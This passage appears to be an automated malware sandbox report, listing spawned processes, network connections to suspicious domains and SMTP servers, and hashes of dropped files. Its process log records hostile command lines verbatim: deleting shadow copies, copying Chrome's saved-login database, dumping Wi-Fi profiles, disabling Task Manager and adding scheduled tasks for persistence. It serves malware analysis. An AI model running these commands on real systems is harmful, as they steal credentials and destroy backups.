/c del "C:\Users\Admin\AppData\Roaming\18.exe"

C:\Users\Admin\AppData\Roaming\21.exe

C:\Users\Admin\AppData\Roaming\21.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4792 -ip 4792

C:\Users\Admin\AppData\Roaming\feeed.exe

"C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF6F3.tmp"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 612

C:\Users\Admin\AppData\Roaming\21.exe

"{path}"

C:\Users\Admin\AppData\Roaming\21.exe

"{path}"

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Users\Admin\AppData\Roaming\25.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Users\Admin\AppData\Roaming\26.exe

C:\Users\Admin\AppData\Roaming\26.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:10552 CREDAT:17410 /prefetch:2

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\24.exe

"{path}"

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\Kudftrf0\jjli4n.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Windows\SysWOW64\cmd.exe

/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V

C:\Users\Admin\AppData\Roaming\30.exe

C:\Users\Admin\AppData\Roaming\30.exe

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Users\Admin\AppData\Roaming\31.exe

C:\Users\Admin\AppData\Roaming\31.exe

C:\Windows\SysWOW64\raserver.exe

"C:\Windows\SysWOW64\raserver.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\Jprfxr\xdclkzixuh8.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mshta.exe "C:\Windows\System32\Info.hta"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mshta.exe "C:\Users\Admin\AppData\Roaming\Info.hta"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@13804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 13804 -ip 13804

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Program Files (x86)\Uftg\nnennq.exeapter

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 13804 -s 492

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0

C:\Program Files (x86)\Uftg\nnennq.exe

"C:\Program Files (x86)\Uftg\nnennq.exe"

C:\Windows\SysWOW64\autoconv.exe

"C:\Windows\SysWOW64\autoconv.exe"

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe /C

C:\Windows\system32\mshta.exe

mshta.exe "C:\Windows\System32\Info.hta"

C:\Windows\SysWOW64\systray.exe

"C:\Windows\SysWOW64\systray.exe"

C:\Windows\system32\mshta.exe

mshta.exe "C:\Users\Admin\AppData\Roaming\Info.hta"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE21E.tmp"

C:\Users\Admin\AppData\Roaming\26.exe

"{path}"

C:\Users\Admin\AppData\Roaming\26.exe

"{path}"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn cguaoqu /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I cguaoqu" /SC ONCE /Z /ST 05:16 /ET 05:28

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7884 CREDAT:17410 /prefetch:2

C:\Program Files (x86)\Kudftrf0\jjli4n.exe

"C:\Program Files (x86)\Kudftrf0\jjli4n.exe"

C:\Windows\SysWOW64\REG.exe

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8D13.tmp"

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Pcllkyiz\oeuul.exe /C

C:\Program Files (x86)\Kudftrf0\jjli4n.exe

"{path}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\CpSnJ\CpSnJ.exe

C:\Program Files (x86)\Jprfxr\xdclkzixuh8.exe

"C:\Program Files (x86)\Jprfxr\xdclkzixuh8.exe"

C:\Windows\SysWOW64\cmmon32.exe

"C:\Windows\SysWOW64\cmmon32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nodejs.org udp
US 172.66.128.116:443 nodejs.org tcp
US 8.8.8.8:53 telete.in udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
FR 92.204.160.54:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 runeurotoolz.hopto.org udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
NL 93.115.21.29:443 tcp
US 8.8.8.8:53 www.dsooneclinicianexpert.com udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.mezhyhirya.com udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 3.33.130.190:80 www.mezhyhirya.com tcp
US 199.59.243.228:443 telete.in tcp
NL 193.34.166.247:443 tcp
NL 2.56.213.179:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.eatatnobu.com udp
US 3.33.130.190:80 www.eatatnobu.com tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 onedrive.live.com udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 13.107.139.11:443 onedrive.live.com tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 smtp.yandex.com udp
US 199.59.243.228:443 telete.in tcp
RU 77.88.21.158:587 smtp.yandex.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 8.8.8.8:53 www.androidaso.com udp
DE 3.75.10.80:80 www.androidaso.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
NL 193.34.166.247:443 tcp
NL 45.153.186.47:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 cmdtech.com.vn udp
US 8.8.8.8:53 telete.in udp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 199.59.243.228:443 telete.in tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.198:80 r11.o.lencr.org tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 8.8.8.8:53 sibelikinciel.xyz udp
NL 185.45.193.50:443 tcp
US 8.8.8.8:53 udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.mysteryvacay.com udp
US 199.59.243.228:443 telete.in tcp
US 15.197.225.128:80 www.mysteryvacay.com tcp
US 15.197.225.128:80 www.mysteryvacay.com tcp
US 15.197.225.128:80 www.mysteryvacay.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
NL 185.45.193.50:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.amazoncarpet.com udp
US 52.71.57.184:80 www.amazoncarpet.com tcp
US 52.71.57.184:80 www.amazoncarpet.com tcp
US 52.71.57.184:80 www.amazoncarpet.com tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.dannynhois.com udp
US 199.59.243.228:443 telete.in tcp
NL 45.153.186.47:443 tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 sibelikinciel.xyz udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 smtp.ecojett.co udp
US 8.8.8.8:53 www.garrettfitz.com udp
US 34.149.87.45:80 www.garrettfitz.com tcp
US 34.149.87.45:80 www.garrettfitz.com tcp
US 34.149.87.45:80 www.garrettfitz.com tcp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 smtp.zoho.eu udp
IE 89.36.170.164:587 smtp.zoho.eu tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.uppertenpiercings.amsterdam udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 smtp.yandex.com udp
RU 77.88.21.158:587 smtp.yandex.com tcp
US 8.8.8.8:53 www.europartnersplus.com udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.europartnersplus.com udp
VN 202.92.6.10:443 cmdtech.com.vn tcp
US 8.8.8.8:53 telete.in udp
US 199.59.243.228:443 telete.in tcp
NL 2.56.213.179:443 tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.langongzi.net udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 www.kms-sp.com udp
JP 202.254.234.127:80 www.kms-sp.com tcp
JP 202.254.234.127:80 www.kms-sp.com tcp
JP 202.254.234.127:80 www.kms-sp.com tcp
US 199.59.243.228:443 telete.in tcp
US 8.8.8.8:53 ffvgdsv.ug udp

Files

C:\Users\Admin\AppData\Local\Temp\6A72.tmp\6A73.tmp\6A74.bat

MD5 ba36077af307d88636545bc8f585d208
SHA1 eafa5626810541319c01f14674199ab1f38c110c
SHA256 bec099c24451b843d1b5331686d5f4a2beff7630d5cd88819446f288983bda10
SHA512 933c2e5de3bc180db447e6864d7f0fa01e796d065fcd8f3d714086f49ec2f3ae8964c94695959beacf07d5785b569fd4365b7e999502d4afa060f4b833b68d80

C:\Users\Admin\AppData\Roaming\1.jar

MD5 a5d6701073dbe43510a41e667aaba464
SHA1 e3163114e4e9f85ffd41554ac07030ce84238d8c
SHA256 1d635c49289d43e71e2b10b10fbb9ea849a59eacedfdb035e25526043351831c
SHA512 52f711d102cb50fafefc2a9f2097660b950564ff8e9324471b9bd6b7355321d60152c78f74827b05b6332d140362bd2c638b8c9cdb961431ab5114e01851fbe4

C:\Users\Admin\AppData\Roaming\2.exe

MD5 715c838e413a37aa8df1ef490b586afd
SHA1 4aef3a0036f9d2290f7a6fa5306228abdbc9e6e1
SHA256 4c21a70dbc6b9bc5e1ee1e7506ee205eecdb14cc45571423e6bcc86dbe4001e7
SHA512 af13c0efb1552bbfbb517e27ff70a00cba5c230e3d2e707bd28a9ccce40e0402793c4ecc32ba1418f19a3744b78b89e5c8709eae3ad5f883c474832c182de861

C:\Users\Admin\AppData\Roaming\3.exe

MD5 d2e2c65fc9098a1c6a4c00f9036aa095
SHA1 c61b31c7dbebdd57a216a03a3dc490a3ea9f5abd
SHA256 4d7421e6d0ac81e2292bcff52f7432639c4f434519db9cf2985b46a0069b2be8
SHA512 b5bd047ca4ee73965719669b29478a9d33665752e1dbe0f575a2da759b90819e64125675da749624b2d8c580707fd6a932685ab3962b5b88353981e857fe9793

C:\Users\Admin\AppData\Roaming\4.exe

MD5 ec7506c2b6460df44c18e61d39d5b1c0
SHA1 7c3e46cd7c93f3d9d783888f04f1607f6e487783
SHA256 4e36dc0d37ead94cbd7797668c3c240ddc00fbb45c18140d370c868915b8469d
SHA512 cf16f6e5f90701a985f2a2b7ad782e6e1c05a7b6dc0e644f7bdd0350f717bb4c9e819a8e9f383da0324b92f354c74c11b2d5827be42e33f861c233f3baab687e

C:\Users\Admin\AppData\Roaming\5.exe

MD5 4fcc5db607dbd9e1afb6667ab040310e
SHA1 48af3f2d0755f0fa644fb4b7f9a1378e1d318ab9
SHA256 6fb0eacc8a7abaa853b60c064b464d7e87b02ef33d52b0e9a928622f4e4f37c7
SHA512 a46ded4552febd7983e09069d26ab2885a8087a9d43904ad0fedcc94a5c65fe0124bbf0a7d3e7283cb3459883e53c95f07fa6724b45f3a9488b147de42221a26

memory/1440-81-0x0000000000400000-0x000000000042D000-memory.dmp

memory/3152-85-0x0000000000400000-0x00000000004B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\6.exe

MD5 cf04c482d91c7174616fb8e83288065a
SHA1 6444eb10ec9092826d712c1efad73e74c2adae14
SHA256 7b01d36ac9a77abfa6a0ddbf27d630effae555aac9ae75b051c6eedaf18d1dcf
SHA512 3eca1e17e698c427bc916465526f61caee356d7586836b022f573c33a6533ce4b4b0f3fbd05cc2b7b44568e814121854fdf82480757f02d925e293f7d92a2af6

C:\Users\Admin\AppData\Roaming\7.exe

MD5 42d1caf715d4bd2ea1fade5dffb95682
SHA1 c26cff675630cbc11207056d4708666a9c80dab5
SHA256 8ea389ee2875cc95c5cd2ca62ba8a515b15ab07d0dd7d85841884cbb2a1fceea
SHA512 b21a0c4b19ffbafb3cac7fad299617ca5221e61cc8d0dca6d091d26c31338878b8d24fe98a52397e909aaad4385769aee863038f8c30663130718d577587527f

memory/928-102-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\8.exe

MD5 dea5598aaf3e9dcc3073ba73d972ab17
SHA1 51da8356e81c5acff3c876dffbf52195fe87d97f
SHA256 8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c
SHA512 a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

memory/4572-106-0x00000000003E0000-0x000000000048C000-memory.dmp

memory/4572-110-0x0000000004C20000-0x0000000004C34000-memory.dmp

memory/4480-112-0x0000000000570000-0x0000000000580000-memory.dmp

memory/4572-122-0x00000000052F0000-0x0000000005894000-memory.dmp

memory/4572-124-0x0000000004E40000-0x0000000004ED2000-memory.dmp

memory/4572-123-0x0000000004D30000-0x0000000004D38000-memory.dmp

C:\Users\Admin\AppData\Roaming\9.exe

MD5 ea88f31d6cc55d8f7a9260245988dab6
SHA1 9e725bae655c21772c10f2d64a5831b98f7d93dd
SHA256 33f77b1bca36469dd734af67950223a7b1babd62a25cb5f0848025f2a68b9447
SHA512 5952c4540b1ae5f2db48aaae404e89fb477d233d9b67458dd5cecc2edfed711509d2e968e6af2dbb3bd2099c10a4556f7612fc0055df798e99f9850796a832ad

memory/4932-131-0x00000000007E0000-0x000000000089E000-memory.dmp

memory/4932-137-0x00000000052F0000-0x00000000052FA000-memory.dmp

memory/4572-139-0x0000000004F80000-0x0000000004F88000-memory.dmp

memory/4572-141-0x0000000004FA0000-0x0000000004FA8000-memory.dmp

memory/4572-140-0x0000000005030000-0x0000000005074000-memory.dmp

C:\Users\Admin\AppData\Roaming\10.exe

MD5 68f96da1fc809dccda4235955ca508b0
SHA1 f182543199600e029747abb84c4448ac4cafef82
SHA256 34b63aa5d2cff68264891f11e8d6875a38ff28854e9723b1db9c154a5abe580c
SHA512 8512aa47d9d2062a8943239ab91a533ad0fa2757aac8dba53d240285069ddbbff8456df20c58e063661f7e245cb99ccbb49c6f9a81788d46072d5c8674da40f7

memory/1440-162-0x0000000000460000-0x000000000046B000-memory.dmp

memory/3184-164-0x0000000000920000-0x000000000092B000-memory.dmp

memory/1440-163-0x0000000000400000-0x000000000042D000-memory.dmp

memory/4932-171-0x0000000007CA0000-0x0000000007D3C000-memory.dmp

memory/4932-170-0x0000000007B90000-0x0000000007BE8000-memory.dmp

memory/4932-165-0x0000000005700000-0x0000000005708000-memory.dmp

C:\Users\Admin\AppData\Roaming\11.exe

MD5 9d4da0e623bb9bb818be455b4c5e97d8
SHA1 9bc2079b5dd2355f4d98a2fe9879b5db3f2575b0
SHA256 091ff5f5bab1cbb2d27a32fedaff1f64dd4004e4a68665e8d606e28585d928a8
SHA512 6e6fab5f4a045349717762ff782527e778b40c5f41ce32428c63aea0dd6e8b73bfdaf3ac55474275f716e9f84632906196edafc4337d816055a69b2ea0904e37

memory/928-187-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\12.exe

MD5 192830b3974fa27116c067f019747b38
SHA1 469fd8a31d9f82438ab37413dae81eb25d275804
SHA256 116e5f36546b2ec14aba42ff69f2c9e18ecde3b64abb44797ac9efc6c6472bff
SHA512 74ebe5adb71c6669bc39fc9c8359cc6bc9bb1a77f5de8556a1730de23104fe95ec7a086c19f39706286b486314deafd7e043109414fd5ce0584f2fbbc6d0658a

memory/3368-231-0x0000000000C40000-0x0000000000C41000-memory.dmp

memory/928-243-0x000002779E2C0000-0x000002779E2C1000-memory.dmp

memory/3368-261-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/2472-259-0x0000000000400000-0x000000000055D000-memory.dmp

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\docs\public\cli-commands\npm-bugs\index.html

MD5 d0fcb234527b62597027adfe909a58d1
SHA1 e46877bfb15bbdb029aaa7777b952b3b30b0695c
SHA256 fa6dae131ec446c7a489fff6ef3d6952f8e34cf113eb3df7c8c643697492f617
SHA512 c7850e31c0a7cdd810fa778400a519d5ce34499fa8f660aac5288a88b72badefbb2e657fda3db9260ea442b7b930da1011b181b101d117410428af04fc0e78a1

memory/5004-282-0x0000000000400000-0x000000000300E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp

MD5 06a9f2b2bb71dac4c45df1ed6ba5289a
SHA1 b9661427441fbce20db2b090fb25cc93dd31e527
SHA256 fe4921bdff41eeadc4df7f7c23bc75d6daba064ab5100fd1ee825acbe691d3f4
SHA512 cfa669904eba220a91031516f36434c96346b94ca131036e1611ccc1e5f842167ef357d6d08cec4f778735b22d2f351130de145e32c53d53c81f23ece868a3ea

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\cliui\node_modules\strip-ansi\license

MD5 5ad87d95c13094fa67f25442ff521efd
SHA1 01f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA256 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA512 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\crypto-random-string\license

MD5 940fdc3603517c669566adb546f6b490
SHA1 df8b7ea6dff65e7dd31a4e2f852fb6f2b45b7aa3
SHA256 6b18e4f3ea8443739a64c95ecf793b45e4a04748da67e4a1479c3f4bba520bd6
SHA512 9e2cf5b0c3105c7ec24b8382a9c856fc3d41a6903f9817f57f87f670073884c366625bc7dee6468bb4cbd0c0f3b716f9c7c597058098141e5a325632ea736452

memory/4024-1631-0x0000000000400000-0x000000000042D000-memory.dmp

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\doc\wg-meetings\2015-01-30.md

MD5 fda6b96a1cac19d11bcdee8af70e5299
SHA1 449cff987f8b8d79b53c9ab93a7dc18f6d6f3ca8
SHA256 b5108c42d95185b1b71e86963bf784ddfd123da4178d41cef052be08c6429cb6
SHA512 f6483ffffc8a71a583d70fe6c4bf001a95f9c8a6b4e70fa0e322f2008170144794ddb42a396fb694b8039cb4a572a655ff877dd95d3ac95b6f6aafeab390a670

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\.travis.yml

MD5 b112fec5b79951448994711bbc7f6866
SHA1 b7358185786bf3d89e8442ac0a334467c5c2019b
SHA256 c3d79e198270443970b49c4f3e136551eb6c7c81a2300b931ae32ce17dad0967
SHA512 d46e1c11a6604e413163a2092e1a9925adc7b5df48a07fa70e87dd0216e7ef432bed3f3c75bed4f1ad4d707b7aeddce63abfca3d4bd1c6e29f215f8e258d5737

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_duplex.js

MD5 63b92584e58004c03054b4b0652b3417
SHA1 67efe53912c6d4cdeb00227deb161fe0f13e5bfb
SHA256 76d5dc9dcae35daa0a237fe11ef912b89dcf25c790f4d6ba1eadc2c97e8dad4c
SHA512 ca5ada5a9b0070ee9eaa1b70e3690fae1880a77bafc050c24019fd28c90bb98479237e0dfd9209994e1e44617f8dd2f7aa75133a6e1a034c18ae55504f076837

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\lib\_stream_passthrough.js

MD5 41247801fc7f4b8f391bc866daf2c238
SHA1 d858473534bfbd539414b9e3353adfc255eed88b
SHA256 d5e328cb2e044902c3ace9da8d277298b04bcb4046bcd5a4cd3d701e56497d6c
SHA512 c9197747ddc57818474c861e4ce920a98a5d0a32589ef2d08fd37320daac2400512b23b51cbb89999fca1ca17f375daf3453ced8e2a5e9aa538a371f31f5561b

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\fs-minipass\LICENSE

MD5 b020de8f88eacc104c21d6e6cacc636d
SHA1 20b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA256 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA512 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\README.md

MD5 a92ecc29f851c8431af9a2d3f0555f01
SHA1 06591e3ff094c58b1e48d857efdadb240eafb220
SHA256 6b8a003975a1c056caee0284b9e1930192cac1bd0ea2181f594290057d2c0687
SHA512 347ae85c821e06ba6e239ec2230c52dee6ca68ab52ccf9f57067e7152b9be0f832d4bbc7f30ffd4784427a81c0797af8b46bce8b4ab9fc0843f6424676a64b5c

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\LICENSE

MD5 48ab8421424b7cacb139e3355864b2ad
SHA1 819a1444fb5d4ea6c70d025affc69f9992c971c9
SHA256 9d364120560d6770fd7e663d23311f871c2c597327cd4c1fced97dbab25183f4
SHA512 b6029a0f811c1c8fbdd9d57cdc16ff469cc8a023468a0390643270ffe21774de02cd950908355df71ed95d2b7c27387478f88cb1fd23d84b45c47a97364edf15

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\lib\string_decoder.js

MD5 81fc92e6c5299a2a99c710a228d3299b
SHA1 8ef7f95a46766ff6e33d56e5091183ee3a1b1eea
SHA256 00fd7780ba199a984bbc1f35875017ae26fb8e48ef6e3e4b11fcf0954478e0fb
SHA512 c2ba9ba55784e4a89cfcd644232654a32bb43c20f7a916d69ef4e65f9b88810813432531e3812a93f4686ab103676976a6deb78f39f3380350107991938b4a6a

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\string_decoder\.travis.yml

MD5 f11e385dcfb8387981201298f1f67716
SHA1 9271796a1d21e59d1a2db06447adbae7441e76cf
SHA256 8021d98e405a58cd51b76bf2669b071be7815db2c68216403c1ca02989c1ec2e
SHA512 fdcae76ecedb4a3306763cca3359c9be2b6d30a88a37c5527c1c4e9f64c53abb0c1369af05dc7e420437476f9f050c999492d31117e3a1c312bd17b35740efd5

C:\Users\Admin\qnodejs-node-v13.13.0-win-x64.tmp472426959190\node-v13.13.0-win-x64\node_modules\npm\node_modules\from2\node_modules\readable-stream\writable.js

MD5 fcb52503b2a3fd35d025cde5a6782d15
SHA1 2e47c9e030510f202245566f0fbf4e209f938bad
